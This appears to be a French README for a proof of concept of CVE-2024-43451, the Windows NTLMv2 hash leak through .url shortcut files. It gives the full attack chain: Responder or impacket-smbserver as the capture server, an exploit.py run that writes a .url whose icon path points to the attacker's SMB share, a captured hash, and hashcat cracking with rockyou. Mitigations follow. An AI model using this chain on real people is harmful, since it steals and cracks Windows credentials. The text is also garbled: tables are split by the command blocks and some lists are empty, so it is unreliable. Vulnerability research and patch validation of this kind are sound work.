
Reproduction de CVE : cve-2024-43451-ntlm_hash_disclosure_reproduction
CVE-2024-43451 est une vulnérabilité de divulgation de hachage NTLMv2 par usurpation dans Windows. Elle permet à un attaquant distant non authentifié de divulgâcher le hachage NTLM d'une victime en l'incitant à interagir avec un fichier .url malveillant. La vulnérabilité est déclenchée avec une interaction minimale de l'utilisateur — un simple clic droit, une suppression ou un déplacement du fichier suffit pour divulguer le hachage. Elle porte un score CVSS de 6,5 (Moyen) et a été activement exploitée dans la nature. CISA l'a ajoutée à son catalogue des vulnérabilités connues exploitées (KEV).
NTLM (NT LAN Manager) est un protocole d'authentification par défi-réponse utilisé par Windows. Lorsqu'un client tente d'accéder à une ressource via SMB, le client et le serveur effectuent une négociation :
NEGOTIATE_MESSAGE contenant les capacités prises en charge.CHALLENGE_MESSAGE contenant un nonce de 8 octets (défi du serveur).AUTHENTICATE_MESSAGE contenant le hachage NTLMv2 — un HMAC-MD5 du défi combiné avec le hachage du mot de passe de l'utilisateur, son nom d'utilisateur et son domaine.Si un attaquant peut observer ou déclencher une tentative d'authentification NTLM vers une machine qu'il contrôle, le AUTHENTICATE_MESSAGE capturé peut être cassé hors ligne pour récupérer le mot de passe en clair.
Un fichier .url est un fichier de raccourci utilisé par Internet Explorer et l'Explorateur Windows pour stocker des liens. C'est un fichier au format INI avec une section [InternetShortcut]. Les champs critiques pour l'exploitation sont :
URL= — l'URL cible que Windows ouvrira.IconFile= — un chemin UNC optionnel vers une ressource d'icône. Lorsque l'Explorateur Windows affiche le fichier, il tente automatiquement de récupérer l'icône depuis le partage distant, déclenchant une tentative d'authentification NTLM vers le serveur de l'attaquant.L'attaquant crée un fichier .url avec un paramètre IconFile pointant vers \\ip-attaquant\partage\icon.ico. Lorsque la victime :
l'Explorateur Windows tente de charger l'icône depuis le chemin UNC, envoyant le hachage NTLMv2 de la victime au récepteur SMB de l'attaquant (par exemple, Responder).
Toutes les versions prises en charge de Windows antérieures à la mise à jour du Patch Tuesday de novembre 2024 :
| Outil | Description |
|---|---|
| Responder | Empoisonneur LLMNR/NBT-NS/mDNS avec serveur SMB intégré pour la capture de hachages |
| Impacket |
Avec Responder :
sudo responder -I eth0 -v
Ou avec Impacket :
sudo impacket-smbserver share . -smb2support
python exploit.py --ip 192.168.1.100 --output malicious.url
Toute action suivante déclenche la fuite du hachage :
Le récepteur SMB de l'attaquant reçoit un hachage NTLMv2 :
[SMB] NTLMv2-SSP Hash : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt
# Voir exploit.py dans ce dépôt pour une implémentation complète du PoC.
# Le script génère un fichier .url avec IconFile défini sur :
# \\192.168.1.100\share\icon.ico
# et éventuellement une icône d'affichage personnalisée via IconIndex.
smbserver.py peut être utilisé pour héberger un simple partage SMB |
| Inveigh | Outil de capture NTLM basé sur PowerShell pour Windows |
| Atténuation | Description |
|---|
| Appliquer le correctif de novembre 2024 | Installer la mise à jour de sécurité de Microsoft à partir de KB5044285 |
| Bloquer le SMB sortant (port 445) | Empêcher les hachages NTLM de quitter le périmètre réseau |
| Désactiver NTLM si possible | Utiliser l'authentification uniquement Kerberos |
| Activer la signature SMB | Empêche les attaques de relais même si les hachages sont capturés |
| Formation à la sensibilisation des utilisateurs | Eduquer les utilisateurs à ne pas interagir avec des fichiers .url inattendus |
| Restreindre la gestion des fichiers .url | Utiliser la stratégie de groupe pour bloquer l'exécution ou la distribution de fichiers .url par email |